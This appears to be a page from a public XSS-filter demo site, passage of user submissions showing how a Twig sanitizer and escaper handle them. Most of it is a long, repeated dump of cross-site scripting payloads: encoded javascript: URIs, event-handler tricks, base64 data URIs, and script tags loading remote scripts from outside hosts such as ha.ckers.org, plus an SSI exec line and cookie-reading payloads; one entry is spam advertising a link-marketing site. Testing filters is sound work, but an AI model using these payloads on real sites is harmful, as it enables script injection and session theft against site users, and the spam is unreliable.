SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") <img src="javascript:alert('XSS');"> <img src=javascript:alert(&quot;XSS&quot;)> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert("XSS");</script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search <h1><font color=blue>hellox worldss</h1> <BODY ONLOAD=alert('hellox worldss')> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus><input autofocus> <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form><button formaction="javascript:alert(XSS)">lol <!--<img src="--><img src=x onerror=alert(XSS)//"> <![><img src="]><img src=x onerror=alert(XSS)//"> <style><img src="</style><img src=x onerror=alert(XSS)//"> <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> <% foo><x foo="%><script>alert(123)</script>"> <div style="font-family:'foo&#10;;color:red;';">LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; \\";alert('XSS');// &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; &lt;BODY ONLOAD=alert('XSS')&gt; &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; &lt;BR SIZE=\"&{alert('XSS')}\"&gt; &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt; žscriptualert(EXSSE)ž/scriptu &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; &lt;!--&#91;if gte IE 4&#93;&gt; &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; &lt;!&#91;endif&#93;--&gt; &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; a=\"get\"; b=\"URL(\\"\"; c=\"javascript&#058;\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; &lt;HTML&gt;&lt;BODY&gt; &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; &lt;/BODY&gt;&lt;/HTML&gt; &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; &lt;? echo('&lt;SCR)'; echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;

keyword(s):

description:

by 3 | at 2020-04-13 11:10:32

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert(123)

result with twig: {{ xss.xss | escape }}:

<a>alert(123)</a>

keyword(s): r

description: <dss>/<s?.

by r | at 2020-04-13 11:10:00

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hi there Here is your quotation regarding the content marketing links that you inquired about https://www.arteseo.co/quotation/ thank you Mike

result with twig: {{ xss.xss | escape }}:

hi there Here is your quotation regarding the content marketing links that you inquired about https://www.arteseo.co/quotation/ thank you Mike

keyword(s):

description: hi there Here is your quotation regarding the content marketing links that you inquired about https://www.arteseo.co/quotation/ thank you Mike

by Lyda Erb | at 2020-04-12 16:44:34

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<iframe src=" prompt(1) " > <svg><style>{font-family:'<iframe/>' <input/ <sVg><isindex <img src='https://dl.dropbox.com/u/13018058/js.js'></object> <iframe src=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=alert('XSS');\" <IFRAME SRC=\"alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"alert('XSS');\"></FRAMESET>
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <>> <>.>< > <>> &> > <> <><> <> <> >&><>> <><><>& >&>]]> <> <><><>< ></XML> <XML SRC=\"xsstest.xml\" ID=I></XML> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> </BODY></HTML> <!--#exec cmd=\"/bin/echo ''\"--> <? echo('alert(\"XSS\")'); ?> > <><> \" > \" '' > '\" > ` > '>\" > (\"<> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >>

result with twig: {{ xss.xss | escape }}:

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(1)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") <img src="javascript:alert('XSS');"> <img src=javascript:alert(&quot;XSS&quot;)> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs 